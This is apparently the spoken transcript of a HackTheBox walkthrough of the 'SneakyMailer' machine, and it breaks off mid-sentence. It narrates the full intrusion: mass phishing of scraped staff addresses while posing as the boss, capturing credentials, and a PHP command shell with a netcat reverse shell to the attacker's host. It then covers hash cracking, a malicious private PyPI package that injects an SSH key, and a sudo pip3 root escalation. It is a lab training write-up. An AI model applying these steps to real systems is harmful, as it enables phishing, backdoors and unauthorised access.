Welcome back today. I'm so excited to have you guys here for a medium box. It's been a while since we've had one, and this one is Sneaky Mailer. I gotta tell you right now, HackTheBox put a lot of effort into this one. Solcud put it together, and it was really tough. For the beginning part, just to get that foothold was incredibly difficult. Turn that around, and it was very difficult to get to the next level. When you got to the end was super simple. The root was a basic exploit, but everything that went into the process to get there is what made this box unique and kind of fun. All right, if you look at this graphic right here, so they give you these sometimes as a tip, and this graphic is clearly about phishing. So we're going to do some phishing attempt in here. In addition, the little snake coming out of the water on that line is that little bit of tribute to, we're going to do some Python. We're actually going to do pypi and do some private packages and upload them. It's going to be a little bit tricky, but I'll show you how to get through it. There were only about 3,000 people, I think, that completed this box. So it was definitely, I think, on the higher end of medium. But it was a great box. I really recommend going back and playing around with it. So we're going to talk about phishing. There's a little bit of credential, just grabbing them and reusing them. Subdomains. There's a few subdomains in here that are going to pop up, but I'm going to show you where they pop up one by one as you go through it. We're going to have some SSH Port Forwarding, everybody's favorite thing when you're talking OSCP. There's going to be that, like I said, crafting the private backdoor. There's going to be that other favorite for OSCP, authorized key injection. So putting your SSH key into your target, and then GTFObins for pip3 at the very end. For this one, it's really stripped down to not a lot. You're going to need your browser. I did initially do my phishing attack through Bash, but this time when I went back through it, I really found some cool tools. So I wanted to share with you guys Swiss Army Knife SMTP. Goes by swaks, and then Telnet is another way to go through an interface with those different things. Email application, I use Thunderbird. I have tried Thunderbird, Evolution, a bunch of different ones. I hate them all, to be honest, but I've found a way to get Thunderbird to work. So I'm going to show you how to make Thunderbird work in this case when it's very customized, especially for HackTheBox. You're going to need some FTP in here. You're going to hit it once or twice. You're going to use John because there's some credentials that got to be cracked. And then Python 3 is what you're going to use for the backend to do all the Python packaging and distribution. All right, a lot to get to here, so let's get started. So as always, we'll get started with an NMap. We'll do an NMap on 10.10.10.197. I'm going to go ahead and do a VV just because I like to see what's going on. Should be pretty fast. I'm going to leave it to 1,000 ports and let's see what comes back. So it came back pretty fast. There's FTP, there's SSH. We've got a little bit of SMTP, which kind of lines up with what we're expecting for the phishing attack. You've got a port 80 HTTP, no problem. Your two IMAP ports are here, which also kind of lines up with some of that phishing attack stuff. And then there's another 8080 HTTP out there. So we can go ahead and take a look at them. You can do a scripts and versions. I'll go ahead and run that, but not a lot comes out of that. That's significant for us. So we'll go ahead and let that run while we go take a look at, let's try FTP. So we get in here, we'll go anonymous. No anonymous allowed. So we don't really have any credentials. We're going to go ahead and exit out of that. See what else we had. We had port 80. So let's take a look at port 80. 197. And you're going to see that it instantly redirects us to sneakycorp.htb. So we're going to go in here and do a sudo nano etc host, and we're going to add it into the host files. So here we'll put in 10.10.10.197, and we will call this sneakycorp.htb. sneakycorp.htb. Close it and save it, and then we can come back over to this window and refresh. Sweet. So we got a lot going on here. There's a dashboard, there's a team. That doesn't look like it goes anywhere. They do mention PYPI. It's 80% testing, so it's not complete, but it is recognizing that the SMTP is good. And it says it is now possible to install modules with pip on our servers. So we'll take a look at that in a little bit. There's a little bell up here. It says welcome to, a little bit of typo there. And then there's some messages here. Now you can click on them, but they don't go anywhere. So the problem here is you can't actually read them. But if you go to the view page source, you'll be able to read them that way. So let's go take a look at view page source. Always like to do that. And check for comments, because there's a really weird comment right here where it just says, need to add register link to sidebar for, and then it gives you this little website right here, or this little portion of the website for PYPI. So let's go ahead and see what we see. http sneakycorp.htb /pypi/register.php. Oh, what a cute dog. So it takes us here, and we could say parody infosec me at mine.com. There's a comma at the end there. And then I'll put something in here. But it doesn't go anywhere. Let's take a look at a page source. We'll just scroll down. And it is super basic. It is putting forth some kind of form, but it's really not helping us much. Let's go ahead and take a look at Burp. I do have it open. It's not critical to what we're doing here. I'll tell you that right now. But we'll take a look at this post. So the post went out. Here's my information that I put in. And it came back right away with the same page. It just reloaded the same page. So it got us nothing. There's no additional information. I mean, you know, it's Nginx 1.14.2. There's a couple places that you can find that at, but there's really no information disclosed. So I'm not going to get too worried. Here's that redirect. Move permanently to sneakycorp.htb. So just throwing that out there. There's a couple things you can look at, but nothing super value added in Burp. So we'll go ahead and we're going to try one more, which is just take the register away. And you're going to see that it's a 403 forbidden. So you can't really get an index page out of here, just whatever's inside that PYPI folder. And you can try and enumerate it. You can go through different fuzzing, but we're not going to go too deep into that one. We'll go back to this employee dashboard. And I still want to take a look at those comments. So we'll keep going down. And here's where you start to see the messages. So drop down messages. And it says, hey, my name is Bradley Greer. I'm your personal code tester. I'm reading them backwards because this one says, talk with Bradley. He's your personal tester. And that comes from Kara Stevens. So we've got Bradley Greer, Kara Stevens. Keep going down. Excellent job with those modules. Hope you keep working this way, Kara Stevens. And then the first message in this whole chain really was, hello, I am the owner of the company. You're going to report to me now on. Kara Stevens. So that gave us 2 usernames. But nothing else major here. And that's okay, because what we're going to do is take a look at this site. And it's got a page called Team. And sure enough, there's a table. And that table is, there's 57 entries. There's a lot of entries on this one. And let's see if we can see them all. View page source. I think that's all of them. So this gets us name, where they work, location of their job. So I guess job title, location of job, and then their email address. So right there, I've got enough to start getting some stuff together for phishing attacks. I like to use a simple terminal for this. So I'm going to nano table. I'm going to paste this in. And I do that just because I like to do cat table. And then I use cut because it's so simple for me. So cut, let's cat the table real quick. If you look at it, everything is preceded by a TD bracket, followed by a bracket. So I'm going to grep for @sneaky, and then see where we go from there. So cat table, grep, @sneaky. And that comes back with a bunch of email addresses. Yay! All right. So I'll do a cut based on this, and then I can do a cut based on this. And I know it's a little cumbersome. If you know sed, you can do some really cool things. I find this to just be super easy, especially if you're starting out in pen testing. This is or starting out in Linux at all. It's a really easy way to understand how to manipulate words in Bash. So cut, we're going to say our delimiter is going to be the first bracket, and then we're going to say we're going to be field 2. So field 1 would be everything to the left of this bracket, and then field 2 would be everything to the right. And it's going to include all this information up until this next bracket, and then field 3 would be over there. So if I say, give me field 2, that's where I say it still keeps this other one. So we can come in here and do another cut. And our delimiter this time will be the other angle bracket. And we will select F1 this time. And that gets us a nice clean list. So I will, I'll actually output this into emails. So if I say cat emails, nice clean list, super nice. All right. So we know that there is an SMTP. Let's go ahead and take a look at that with the Telnet. I'll clear the screen real quick. We'll just do 10.10.10.170 or 197.25. Hello, me. Just give it a minute to populate with some print here. You can see it's an ESMTP. It allows us to do things. So we should be able to send messages, and there's an easy way to send it. You can kind of say, let me grab my notes here real quick. If you want to do it by hand, you can just say mail from. So if you say mail from, and for this attack, I really want to take advantage of the fact that we know that Kara Stevens is the boss. So if I say Kara Stevens at Sneaky Mailer, so it's another domain that we got to take into consideration. And then you hit enter, it says okay. So it says mail to, or receipt to. So RCPT 2, and then if I say cat emails, and I just take this last one, so we'll copy that. They really don't make it easy for these. All right, so we'll copy that, and we paste it in here, and we say we're going to send it to Donna Snyder. Cool. The next line is when you say data, and then that begins the field. So I'm going to say subject. You know, it's the boss. Go to this link, just straight up. And then I'm going to need my own server in order to catch things on the other side. So we'll open another tab, and then I'll do a sudo nc ndlp 80. And this will just open it up real simple. I could put on a different port, but right now I'm not trying to share anything. So we'll say HTTP 10.10.14.16. Go to my link and just see what comes back. All right. In order to close out an email, you need to do a single dot on a single line by itself. And then that's where it says it's going to queue it up. And then you just wait to see if anything populates here. Okay. You saw how long that took for one address. We've got to do this, what they say, 50, 70 times. It's just not the most effective way to do it. So right now I want to introduce Swiss Army Knife SMTP. So this was a cool new toy for me. So if you do swaks, it'll actually start building the email. So I don't want to do that. Man swaks. And I'll tell you all about it. It's a all-purpose SMTP. It's used for testing. And so the format is super simple. Swaks --2, and I think it's actually -t if you just want to do it really short. But it also allows you to give the server. A lot of the stuff that I tried to deal with wants to go out and find the servers itself because it's expecting actual servers. With HackTheBox, you're kind of limited because you're really trying to access just what's internal to that network. So swaks ended up being really helpful for me. The challenge here is you can do different users, but you have to do TAC-T, TAC-T, TAC-T. So you can do a couple different ways. You can build a list of TAC-Ts, or you can run an entire, I guess, bash script loop in order to do this. I will say it's probably going to be faster to do it your own way, but they do define it right here. So this is more of testing and everything, but it does say for e in, say cat, and then do this. So you can script this out. So I'll go ahead and show how to do it based on this documentation right here. And then it's going to do one after another, after another, after another. May not be the fastest. And then we'll skip some of this other stuff later. All right. But let's go ahead and give it a shot. So that's still listening. I don't want to do this anymore. We'll go ahead and close that out. So we will say for e in, and I do it one way. I did it a little bit differently here. So I usually do $cat. That's just the way I like to write it. And then we are going to cat emails, do. And then for the do, we'll go ahead and say swaks to e server. Copy that over. Swaks, it's going to do the email address. The server is going to be sneakymailer.htb. And what we want to do here is actually write an email. So I want to go even more in depth. So we set a to, we said the server, I want to say from, and it's going to be that Kara Stevens at Sneaky Mailer. That way everybody thinks it's coming from the boss. And then we're going to put some information in there. The easiest way to do information is to make a file with the data and then plug it in. So we'll come over here because I think I got everything out of there that I need. So I'm going to make a body of an email. So nano body. And we're just going to make it really simple and say subject, check out, put a colon there, check out this link. The next line is going to be that link. So HTTP 10.10.14.16. I'll put a slash, not super important. We'll say exit. And because you're doing this in the swaks, it's going to add that dot line. It's going to build everything. You're going to see it all here because it's super verbose. It's a lot of fun. So we're going to say data. And then we're going to say, what was that? The email was named body. Okay. For e in cat emails to swaks to e. There's the server. So the server, I don't believe we put it into our Etsy host. So sudo nano Etsy hosts. And so we'll just add it onto the back end here. So sneakymailer.htb. Save that one. All right, so we've defined the sneaky mailer server. We've said from Kara Stevens, really doesn't matter. And then here's our data, do all that, and then we're gonna say done. And then what we're really gonna be looking for is whatever pops up here, okay? So let's see how it goes. You can see that it connected, and then it wrote the email, and I'll just scroll up here really fast. It shows everything, and so you can customize this hello message. So it just said parrot because it's built in saying that's our host name. And then it gives the display, and it shows the arrows which ways it's going. This one says mail from Kara Stevens, receipt to Tiger Nixon, data, and then the same thing that we put before, which was check out this link. Here's the link, and then it added some extra lines and then a dot. Bye, and then it connects again and goes and says Garrett Winters. And so this tool is going to run for a little bit, and it's probably going to take a while before we actually get to our target. So we'll go ahead and make that, let that run. Yeah, one of the other things that we're going to need for this is an email application. I've tried a couple. The best one that I've gotten to work is Thunderbird, even though I don't like it. So let's go ahead and start the process of installing it, because I don't leave it on my system a whole lot. So sudo apt-get install Thunderbird. Let that run and go. I'll just keep an eye kind of between these different terminals. We got Colleen Hurst, Sonia Frost. This, like I said, this is probably not the fastest way. I am certain that if you did it all on one line, it would be a lot faster because it would be connected and just send email, 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 email. When I did it before, I made one big script and just kind of pasted it in there, which allowed it to kind of write email, write email, write email. But I found this to be just a neat tool. It's a good one to learn if you're trying to get into certain things like phishing for this application. So we'll just let it continue running. We've got our Thunderbird, so I'm gonna go ahead and launch that. It's gonna be up here in applications under internet now. Just get it started. So when you go to set up an email account, it's going to go through this whole process. I'm going to say cancel for right now, because one of the things that you're going to have an issue with is it's going to be connecting here. You don't want it to be connecting. You want it to be in offline. So by clicking on it once, it will go to offline. So it says, do you want to download messages for offline use before going offline? Just say later. I don't care. When you see that X, you know it's offline. And that is the best way to set it up for these custom applications that you're going to see with HackTheBox. Okay. All right, so we did get one to come back. So you kind of saw a few of them come through here. What do we got here? Okay, somebody posted Python request, first name Paul, last name Bird, Paul Bird at sneakymailer.htb, and then there's a bunch of gobbledygook. So my preference for a lot of these is to use BurpSuite. You don't have to, and I didn't really specify that you needed the decoder here, but it just makes it a little bit easier. You can use things like CyberChef, not a big deal. So for this one, we're going to do URL encoding, and you're going to see here's all that information. And then when you get to here, you have one ugly password, and then this is the same password again. So this is going to be a password that we got to hang on to. All right, I'm going to leave it up in the background, but they should be able to get us into Paul Bird's account. All right, so let's take a look. Like I said, we put it in offline mode. So I'm going to say this is Paul Bird at sneakymailer.htb. And then that's the password that we just copied. I'm going to say manual config, and I'm actually going to go one more step and say advanced config. Advanced config will not work if you're currently online. So that's where you got to make sure that you're offline before you start doing it. Here, we don't want it to try and do imap.sneakymailer.htb. you want to take that dot out of the front and just say, go to sneakymailer.htb, Paul Bird. There is no connection security, and the authentication is just password. I don't even think you have to put that in there. The one other thing that you have to do before you connect, because you'll break it and you'll have to delete the account and re-add it, but make sure to uncheck for IMAP. You want to make sure that you don't have show only subscribe folders, and you're going to see why here in a minute. So just make sure that you see all the folders. So we'll go through that. We're going to say okay. So Paul Bird, and then we're going to connect. And hopefully we should see all the files, all the folders. And that's part of that whole advance by saying show only subscribe. No, I want to see them all. So I guess I'm still gonna hit a snag on that one. Let me try and close it out and see what happens if we open it one more time. I know that earlier I did have to kill it and bring it back up. It is sending the login information. Login failed. All right, just make sure we have the right password. I'm gonna paste this in, say okay. So we got an alert, and then we got all the folders to load. Perfect. All right, so anything in the inbox? No. Nothing in trash, nothing deleted. There is something in sent items. So let's close this out. What do we have in our sent items? There's a password reset email. Hello administrator. So this is from Paul Bird to root. Hello administrator, I want you to change this password for the developer account. So developer, and here's the password. Okay, that seems like a quick kill. This is from Paul to user low, so that kind of gives us another user to keep an eye out for. Your current task is to install, test, and then erase every Python module you find in our pypi service. Let me know if you have any inconvenience. So again, that's kind of tagging that low user is going to be accessing and doing things with pypi. Cool. Well, we have developer. Let's take this password and see what we can do with it. I think all of this script is done. It's still going. It doesn't matter. That was the last one. So we'll clean that up. That one's clean, and we'll cancel this one because we're not too worried about that. So let's SSH to developer at 10.10.10.197. Yes, paste that in. Nope, that's not going to work. All right, let's take a look at what we got back on this. So we still do have FTP, so that's out there. You've got SSH, SMTP, which we've kind of messed with. We've messed with IMAP already. We kind of got through a lot of this stuff pretty quickly. There's 8080, which we still haven't looked at, but it looks like a generic welcome to Nginx. So we don't know too much about that one yet. Let's try FTP. Developer at 10.10.10.197. Wow, okay. So it doesn't like that. And that's just the way that it works. So I'm going to say FTP 10.10.10.197, and then we'll say developer. And it's like that. So that's a good username. And we are in. Cool. So we've got this folder called dev. Let's take a look. ls. So there's an index. You can see that there's a folder called pypi. There's that team PHP. I bet this is that one site. But it's in a development environment, dev. So this is where that pypi stuff is. And there's the register PHP, which doesn't work yet. So I'm not too worried about that. let's see. So I have a simple command shell that I keep in my box, so I'm going to try and put it there. So put, and then it'll ask me for my file. So var www HTML, and this one I just call mine.php. We're going to put it into mine.php. We're going to look at it. It's sitting there, and it's a file. That's good. If we go back over here and we say go to mine.php, you're not going to find it because this is not the development environment. Let's try dev mine.php. Another one of those silly redirects. htpasswd.htb and then dev mine.php. No, not found. Well, this is where you can kind of get into some of the unique checks. You can dub fuzz or some other, you can use NMap to try and look at subdomains, but this is a case where you would likely see a subdomain. So we're going to go that next step and see what we can find by just doing a sudo nano etc host. Ooh, capital is not going to work. Sudo. There we go. All right. So let's try dev.sneakycorp.htb. So we had Sneaky Mailer for the mail server. Let's go back to Sneaky Corp, but try dev. So move my mouse out of the way. Dev.sneakycorp. Let's just try that by itself. Okay. Now you get dev.sneakycorp. Okay. And then here's that register again. So this is that register that we saw. Here's SneakyCorp. And here's dev.sneakycorp. So something to keep in mind. You can try and look through some of these page sources. Does not have the same information. It has the same here, but it didn't have that comment up above. And there's no new comments in this one at all. But we did find the new website. So we're on to our second website, dev.sneakycorp. Now what if I say mine.php from here? PHP. Okay, it's not found. Don't fret, because that actually doesn't mean what you think it means. It means that the system actually deleted it. It was here, and then it's deleted. This system is on a loop to just delete, delete, delete. Super frustrating, but that's okay. Just kind of get used to typing the same thing over, and we'll try and get out of that as soon as we can. So I'll say mine.php, mine.php. Now, before I do this, I want to make sure that the page is loaded. So it does say mine.php. I'm going to go ahead and go forward and say the command is who am I? Just because it's going to delete really fast. So mine.php, go, it's uploaded. If I come up here, I hit enter. Did it really delete it that fast? No, cat mine.php. Man, this thing is fast. And you can't really put the information in there. You can't even tab through here. So there's a couple different ways that you can try and counteract it. I saw a few people who used a web shell. That's just not my preference. I was able to get this to work when I wanted it to. Just doesn't seem to want to work right now. If I go to view page source, okay, so this one actually did have a typo in it. I gotta fix that. Sudo nano bar HTML mine.php. So I just got to bring this PHP over real quick, save it, and then we're going to put it again. And it's in, and we'll rerun this. Did not like it. There we go. So www data. We don't have a lot of time, so I like to say which NC. So it does have NC, but we haven't set up a listener. So we'll go ahead and set up our listener here and just say sudo nc ndlp. Sometimes I like to use 443 just because I know a lot of systems will allow it because it is HTTPS by standard. So nc 10, 10, 14, 16 on 443, and then we'll try to see if it'll allow bin bash. All right, guess what? It's gone already again. But we've got this all queued up, and we know that the command is interfacing, it's working. So var www html mine.php go, hit it. All right, it's hanging. That's always a good sign. And when we come over here, we have this. So if I say ID, sure enough, www data. So which Python? Cool. So we can do a Python upgrade. So Python C to run code, import pty.spawn, and we're going to spawn a new shell in that bin bash environment. And now we've got a little bit better execution here. Awesome. But what does that get us? All right, that's what was in that FTP that we could see. So this is the head of that FTP. Awesome. What is out here? So you've got dev.sneakycorp.htb, which is what we had. You have HTML, you have SneakyCorp, you have another one called pypi.sneakycorp.htb. So we're going to go ahead and add that one into our etc host file again. We're going to just keep adding on. So sudo nano etc host. Come down here and just paste it in. Cool. And just for my edification, I want to see it because it does kind of line wrap. I just like to make tabs between each one of them instead of spaces. So pypi.sneakycorp.htb. Cool. Well, what's Sneaky Corp? pypi. We know that didn't work, so let's try it here. pypi.sneakycorp.htb. Well, that just redirected us to Sneaky Corp. That's not going to work. I'll give you a little bit of time to process that one. We'll just kind of come back here. So we're in this box. You can do some user enumeration. It's a little funky just because I don't like this shell. And I really hate when you do ps aux and it cuts you off because there's some important information in these. So while not necessary, I really like to just see the linpeas output. But linpeas kind of, yeah, it'll run okay. So we'll go cd dev.shm. That's where I like to hang out. And then now I got to turn one of these into a Python server. So cd var.html sudo python 3 m for module server 80. So that's running. And we will go back over here and say wget 10, 10, 14, 16, and then linpeas.sh. As always, you need to modify the permissions to add executable. So linpeas.sh. Well, that's not how you spell it. chmod +x linpeas.sh. Good to go. And then we'll run linpeas.sh. All right. Love my little pea in a pod. Thanks, Carlos Polyp. We'll go ahead and just say, as always, look for red and yellow, look for red. Those are the big things to consider. This box is not going to be that easy. It's really not. So don't look for any red and yellows. Right now you got to kind of look for the smaller things. I apologize for that. So we'll go back up here. All right, here we go. You have ping, you have NC, which we know. That's how we got our permissions. That's how we got our foothold. So here's all the stuff available: netcat, wget, curl, ping, GCC, Python 2, 3, 2.7, 3.7, tons of stuff, Perl, PHP. We got ways to work around. And you come in here, you got one application by low, which is a Python script to install modules. So it's going to go ahead and install modules, looks like automatically. Got postfix, and then you've got this one process from pypi, and it's running out of that pypi directory, the virtual environment bin Python 3. So it's going to run a Python 3 script, and it's going to run a pypi server. It's only going to allow it on interface 127.0.0.1, so that'll be a little bit of an issue for you. But like I said, we're going to do some port forwarding. It's going to be running on port 5000. It's going to allow people to update it, download and list, and then it's going to run all its permissions off of this htpasswd. So that's good to know. And then it'll fall back to these packages by default. So that's a really important line to understand, because that's that module that we're going to need to take advantage of. And we'll come down here. Most of this is going to be me, more than likely. So 1416 in this case, 443. Here's my PTY. Load does have the ability, so they crossed Python 3. So that's that binary permission that's out there that allows it to run this pypi server. Some cron jobs. Tons of information, but that line was the big one. We just want to make sure. So there's a pypi.sneakycorp. sneakycorp.htb. So not so much with the sneaky mailer. That was more just a kind of a tip off to the mail server. All right. And here's your port 5000 that you see. That's the one. There's a port 80. There's still a port 8080 that we haven't played around with too much. You've got your SSH port, your SMTP that we've already gone after. And then here's some connections internally into the 5000 port, the 8080, just interfacing back and forth to itself. All right, we'll keep going down. So 1000 is low. Low has a lot of stuff, but namely it's this pypi package permission that we're going to go after. I think that's going to be the big one. There is another user called developer. I don't think that I mess with it too much, but developer is what allowed us into the FTP. Just keep coming down here. All right, so you can see that there's a homelow.ssh authorized keys. So it tells us up front that exists. And I think that's perfect. So that's what we're going to go after when we start messing around with Python scripting. And it's great that it's right here in linpeas. We'll keep coming down. Here's a lot of your normal applications. Even though they're red, they're not anything significant. There is a user text inside of low, and that's what we're going after first. And we'll keep coming down. All the file information. So this is where it starts to look for passwords in PHP files, passwords inside logs. I think we want some more information, so just keep an eye out for those passwords. This big font makes it a little bit ugly when you're going through linpeas. So I apologize for that. We'll just keep going down. And the secret here is actually going to be down towards the bottom. Starting to see usernames, username, password. Specific hashes, so we've got hash information, test apps, py, Django, and then the very last one here is actually var www pypi htpassword, which was put in that process intentionally. So this is an important file. Let's go ahead and try and find that, take a look at it. So cd var www pypi. So if we do an ls, we're not going to find it. If we say ls-lia, you're going to see that it is here, but it's a hidden file. So it's just a .htpassword. We knew that. So if I cat.htpassword, cat.htpasswd, you're going to have pypi has a password here. Let's go ahead and take that, bring it back to our box. So we're inside Sneaky. I'll say nano hash. We'll paste it in here. And this is where we get to use John. So John hash. You're going to say word list equals. Sometimes I'll do a space here just so I can use tab complete. You can't use it any other way. Word list rocky.txt. And then you just come back here, take that out. Let's let it run. And after less than 30 seconds, you do get a password back. Sufian El Howie. Apologize if I butchered that, but we do have a password. So I'm going to go ahead and copy this and put it into a file just to make it easier. Nano pass. That's our password. So we'll hang on to that one for a little bit later. So where are we at? We've got information from Paul Bird in his email. We're able to pull that down, get the password into FTP, FTP to developer. Developer got us the information to get the first. We're able to upload something into the FTP, run our shell, go down, track down this other password. Can we just use it? So let's try a couple things. So we'll copy this. Su pypi. Paste it in there. No dice. Su low. Paste that in there. Not working. So this is where it starts to get a little bit trickier. So there is a hint that I got around these times on how to make a private pypi. So create private pypi package. So Linode has a super easy one that's here. They kind of explain that it's part of PIP's Python package index. It's all something that you got to get going on this system. We're going to see in the top part of this article, it's going to talk about how to build a package. On the bottom part, it's going to tell you how to set up a server. But we kind of already know there's a server existing there, so it shouldn't be too big of an issue. So they kind of say make an init.py, and then it kind of gives you the structure. So you're going to have your folder, and then inside there you're going to have another folder with your initialize Python script. and then back out to the first folder, you've got a setup.py, setup.config, and then a readme .markdown if you so choose. So let's go ahead and start making our package. I'm gonna go back over to this window and clean it up. So I'm gonna make dir, and this is, we'll call it parity. So we're gonna cd in there, and then we'll make the other directory inside of it. And then we'll cd into that, and then we will nano the initializing script. And we'll just come over here. And a lot of this is super easy cut and paste, and I'll show you where it's not. All right. So here's the setup. Okay, here's the init. It's just a simple hello world. Cool, we'll copy that, bring that over. We'll back out, and then we'll nano that setup.py. No big deal. And we'll just go ahead and rename some of the stuff while we're at it. So I'll call this parity. Parity. I don't mind the hello world version 1. Just for you guys, I'll make sure that we delete all this. ParityInfosec.com. Oi, no, cancel. This is why I don't play in Vim. Vim would be a whole lot worse. Why, this one was made by me. If you ever need anything from me, you can contact me at info@parityinfosec.com. Cool. So that's all done for right now. Let's go ahead and save that. Let's see what else we needed. We built this. We need a setup config file. And it's just going to say that there's a README with a description, but it's not going to be really necessary. But we'll go ahead and paste it in anyways. Save it. It says optionally add license or README, no big deal. And then this is how you're going to distribute your package. So we'll go ahead and give that a shot. And what you're going to see is it's going to say there's no setup tools. And I've talked about this before. This is an issue between Python, Python 2, Python 3. Super annoying. So the easiest way for me is I just call this Python 3. And then it's going to come back and say that this directory doesn't exist. And that is a typo on my part. So we'll come back here, and it was just a matter of capitalization. So we'll say P, lowercase p, try it again. Cool. So what it did is it took all this, created it, copied it all into egg info, and then from there it created a tar archive, wrapped it all up, and then it removed it. So now it's ready to distribute. So if I say ls and you go into the distribution, there is a tar.gz. We're going to need that when we go to go after this box. All right, so we've built our package, but we haven't really built the payload. And we've determined the payload is going to be authorized keys. So we're going to need the program to write into authorized keys. So let's go ahead and ask for our authorized key. So I'm just going to say cat. I'm going to go back to my home folder, SSH, and then you're going to say idrsa.pub. And this is the one that I have right now. Always go back and change these from time to time, every now and then, all the time, whenever you want. Pretty soon I'm going to put out a video just to show kind of my reset process. Just a simple script kind of going through, and it's saying reset the SSH key, reset the password for my test account, reset the SSH port, and have that all run just prior to actually executing. That way I'm not reusing the same information. People won't be going after me, being able to reuse anything that they find. Okay? But for right now, we're going to go ahead and copy this. And we are going to back out. And this should be where that setup.py is. So we'll say nano setup.py. And I'm going to put the information in up here. And I'm just going to say SSH equals this string, just to put it in there. Now, if I try to, I'll just show you. Let's say, let me grab it real quick. I've got my key in there. If I say file.write or file, I'll just make it more particular. File1 equals, and then if we say open, and I'm going to say that it's home low.ssh authorize keys, because that's the information that we got from our linpeas. Go ahead and say I want to write, close it out, and then say file1.write, and then we're just going to write SSH, so that variable SSH will write into the file, and then file1.close. We'll put that. So we're going to open it, we're going to write the SSH key, and then we're going to close it. What's going to happen? I'll tell you right now, it's not going to work. All right, so here's our Python 3. We're going to try and run this distribution. And the first thing is, it's going to try and run this. And it's going to say, I don't have a home low SSH key. I can't do that. And this is where we're going to use kind of a, we're going to launch it from our box. So we're going to need to get around this. But on the other end, we want it to run this code also. So it's kind of a, we need two different paths for the same program, and the best way to do that is a try except block. So we'll come back in here and we will say try, and then don't forget to indent all this stuff, and then I'll come down here and I'll say except. So in the event that there's any exception, it's going to run this section of the code. So when I go to build it, it's going to say, I don't have that file, so I can't do that thing. So run this, and it's going to build. When it gets to the other side and it runs it, it's going to try this, and it's going to say, I do have a directory called home low SSH authorized keys, so it'll execute. Pretty nifty little trick. So we'll go ahead and save that. All right. All right, where are we going to put this though? So if you go back and we take a look at this, and they're going to talk about how to install the pypi server. So package installation, the package installer server, package index, my bad, package index. It's going to be built in this virtual environment. You're going to be running these packages. It's going to be running on 8080. I believe if we go back to the videotape, if we come back up all the way through here and we look at the processes, there's low, postfix, pypi. Okay, you're going to see that it's running 127.0.0.1. Well, it's running on 5,000. So it's a little bit of this, a little bit of that. It's going to be running on pypi, but it's also going to be running on 5,000 for its updates. But you can't access 5,000 remotely, can you? So now's a good time to get into port forwarding. I believe we've done everything we need to do on the box in preparation. We've put our information into the file. We've went ahead and made our distribution. We're going to show you how to upload it here in a minute. We do have to build a kind of information file. So our system needs to know how to go after another kind of system, and it's going to do it through the username and password that we found earlier. So we'll go ahead and build this pypirc, and it'll be the config file. And we're actually going to do it in our home. So it'll be wherever you define home, but because this is the box I use, I'm just going to go ahead and drop it right in the normal home. Let's say nano pypirc. So there's not a file that exists. It's a new file. All right, so it's going to talk about distribution utilities. We know that there's a couple of these things called index servers. So that's the pypi. First one is obviously pypi. The second one we're going to call parity because we're going to actually upload our package into it. And we'll say pypi. Because I'm not updating anything, I really don't care about this information right here. I'm not going to be updating pypi's package. I'm going to be updating my own parity package. So let's add our information down here. Parity. We're going to say that the repository is going to be, and because we're, like I said, we're going to port forward, it's actually going to be HTTP 127.0.0.1 because it is going to be local to us once we do the port forwarding, and it's going to be on port 5000. Okay. We're going to go ahead and use those credentials we found before. So pypi, and all my windows kind of filled up. This one's a good one. So cat pass. I'm going to go ahead and make sure I get this correct. Copy that. We're going to put it in here. So password. And I think I need to have a space here. Don't know if it matters too much, but got all my information in there. So it's going to know how to connect to that repository with those credentials. Hopefully that works. So we've made our credential file, we've made our packages, we've made our payload that went in the package. Let's do our port forward. This is another one of those super simple ones. So I'm going to go ahead and reset my password real quick. Sudo, and we're going to say password for my test account. Put in that, and our new password is going to be sneaky. All right, so that's all good. Let's come back over here. We're going to say SSH. I'm going to say right up front it's going to be port 222. I need to change that port, but for right now that'll work. We're going to talk to test at 10, 10, 14, 16. And then we're going to say we want to do remote port forwarding 5000, 127.0.0.1 because we're going to want to plug it right back into that server on the localhost at port 5000. And I believe that's all the information. We're going to come into port. Here's the test. Here's that. Here's the server. And it found us. And like I said, the password here is going to be sneaky for today. And we are good. Come in here and just do a netstat to verify. Now take my pipe rep 5000. And we can see that we are running a 127.0.0.1 5000 listener. Okay. So we went through and we built the package. So we did this. We did Python 3 setup S distribution, but it's not going to work because now it's time to upload it. So we need to go back into our file. So cd htb sneaky parity. This is where all our stuff's at. So this is where we're going to build. So we're going to do kind of the same thing. We're going to do that distribution. But on top of that, we need to do an upload. So we're going to say upload. And then we're going to say repository, and we're going to say parity, because that's in that pypi folder. That's the one where we said, hey, this is the package, this is the repository, the username, the password. So it's going to look at that one, and it's going to run those credentials and try and get it up. So we're going to run it, build the package, build the package, build the package, upload, submitting, response server, okay. Well, that's pretty nifty. Let's say low SSH. We're going to go at low at 10.10.10.197 I, and we're going to say give it that RSA key. And it's going to ask for the RSA key that I've got. It's another one of those that you want to check and test from time to time, and we've got low. If we say ls, there is our user.txt. Oh my goodness. I know that this went fast. Fast being it's already an hour in or so. But that was such a workload to get to user. I appreciate you guys for sticking around, taking a look at these things. Let's go on to root. Super easy, super fast. Let's get it done. So you can go through and you can do the user enumeration all over again. But one of those things that I do like to check every now and then right away is just a sudo tac L. So give me what I can do. Tell me what I can do as a super user. So we let it run for a little bit. And it's a little slow of a box. I will say that. Wish it was a little bit faster. There you go. It says that the user on SneakyMailer can run as root with no password pip3. So when I see something like that, first thing I do is go to GTFObins. This thing's got it all. I'm going to say pip. There's no pip3, but pip and pip3 are interchangeable. You just got to know how to access it. And right here is all the commands. So if you just copy and paste this, I'm going to paste it into the box. Now, the one thing that you got to remember to do is come back over here and run as pip3. If you try to run as pip, you do not have sudo rights for pip. But if you say pip3, go ahead and let it run. Again, slow, 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 slow. What it's doing is it's making a temp directory, and then it's going to echo your bin.sh command, and then it's going to run tty's pipes, back and forth backpipe, and then it's going to put all into the setup py, and when it runs this install, it's going to install this setup py, which is actually going to run it, very similar to what we did in the pypi script. And I got a hash. Sure enough, it's root. So if we just say cd root, there's my root.txt, cat, root.txt. I got root.txt. I got this box. What a doozy. I sure appreciate all of you guys for hanging around. So with that, great box. I applaud the box maker on this one. The Solcud did an absolutely phenomenal job. Definitely a good box. If you know Python, it's a great box. If you don't know Python, it's an amazing box because you're going to learn. There's no way around it. But there's a little bit of dabbling in phishing, like we talked about earlier. There's definitely passwords kind of going back and forth depending on what systems you were using. There were a few subdomains that you had to get into. Make sure to put those in your Etsy hosts. Some port forwarding, making that private package for the backdoor. Authorized keys injection is always a favorite, and then GTFObins at the end. If you get a chance, try and play with the swaks, that Swiss Army Knife SMTP. It's a great tool. But as you see, Telnet was there. We didn't really use it too much. Email app, FTP, John, Python 3. It was a lot of small applications, but it's really knowing how to use them. The 